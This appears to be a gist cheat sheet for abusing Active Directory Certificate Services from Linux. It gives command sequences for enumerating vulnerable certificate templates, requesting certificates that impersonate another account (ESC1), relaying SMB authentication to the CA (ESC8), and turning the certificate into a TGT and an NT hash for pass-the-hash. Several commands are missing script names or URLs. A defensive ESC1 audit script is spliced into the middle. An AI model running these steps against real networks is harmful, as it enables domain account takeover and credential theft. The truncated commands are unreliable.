
Last active August 26, 2023 13:22
PKI Abuse CheatSheet

PKI Abuse

Some golden links when you are having issues:

Enumerating ADCS On Linux

Download and install Certi

git clone
cd certi
sudo python3 install

Certi only supports Kerberos auth, so to perform authenticated enumeration you first need to fetch a TGT for a valid user:

'<domain>/<username>:<password>' -dc-ip <dc-ip>

Set the env var to the output ccache

export KRB5CCNAME=<username>.ccache

Enumerate Certificate Authorities on the domain (CAs)

python3 list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca

Enumerate CA services on the domain (actual server names)

python3 list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class service

Enumerate vulnerable templates

python3 list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable

Requesting certs from a CA on Linux

Requesting a cert with an alt subject name (ESC1)

python3 req '<domain>/<username>@<ca-server>' <ca-service-name> -k -n --dc-ip <dc-ip> --template <vuln-template> --alt-name <target-domain-account>
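The "vulnerable template" check above and the ESC1 request both hinge on one template configuration. The following is an added audit example, not part of the original cheat sheet, that flags templates matching that pattern so they can be fixed; the attribute names and flag bits are the real AD schema values, while the template records and the simplified "enroll" list (the real enrollment right lives in the template's ACL) are constructed for the example.

```python
# Added audit check, not part of the original cheat sheet: flags templates matching
# the ESC1 pattern that the `--vuln` enumeration above looks for. Attribute names and
# flag bits are real AD schema values; the records and the simplified "enroll" list are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag

# EKUs that let an issued certificate authenticate to the domain.
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
             "2.5.29.37.0"}             # Any Purpose
# Enrollment granted to any of these makes the template reachable by every user.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def esc1_findings(template):
    """Return which ESC1 preconditions the template meets; all five together
    mean a low-privileged requester can obtain an auth cert for any account."""
    reasons = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("requester supplies subject/SAN")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if template.get("msPKI-RA-Signature", 0) == 0:
        reasons.append("no authorized signature required")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list is usable for any purpose
        reasons.append("EKU permits authentication")
    if LOW_PRIV_PRINCIPALS & set(template["enroll"]):
        reasons.append("low-privileged enrollment")
    return reasons

def audit(templates):
    """Map each ESC1-exposed template name to its findings. Remediate by clearing
    ENROLLEE_SUPPLIES_SUBJECT or requiring manager approval on that template."""
    return {t["name"]: r for t in templates if len(r := esc1_findings(t)) == 5}

# Constructed sample: a default-style template (SAN built from AD) and a bad one.
SAMPLE_TEMPLATES = [
    {"name": "User", "msPKI-Certificate-Name-Flag": 0x82000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Users"]},
    {"name": "VPNUsers", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Authenticated Users"]},
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: ESC1 ({'; '.join(reasons)})")
```

In a real audit the records would come from the pKICertificateTemplate objects under CN=Certificate Templates in the Configuration partition, with the enroll list derived from each template's security descriptor.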

Requesting a cert by SMB relaying on Linux (ESC8)

Relaying an incoming SMB connection to ADCS to generate a certificate on

Fetch and install a custom fork of impacket

git clone
cd impacket
git checkout ntlmrelayx-adcs-attack

Create a virtual Python env to contain this version of impacket (avoids breaking the release you already have installed)

apt install python3-venv
python3 -m venv adcs-impacket

Move "into" this virtual env

source adcs-impacket/bin/activate

Still inside the impacket folder:

pip3 install .

You can now set up ntlmrelayx for relaying

python3 examples/ -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>

Authentication using certificate on Linux

Request a TGT on behalf of the account

python3 <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache

Set the env var to the output TGT ccache

export KRB5CCNAME=out_tgt.ccache

Get an NT hash for Pass-the-Hash from the TGT; <AS-REP-ENC-KEY> is taken from the output of the command above.

python3 -key <AS-REP-ENC-KEY> -dc-ip <dc-ip> <domain>/<username>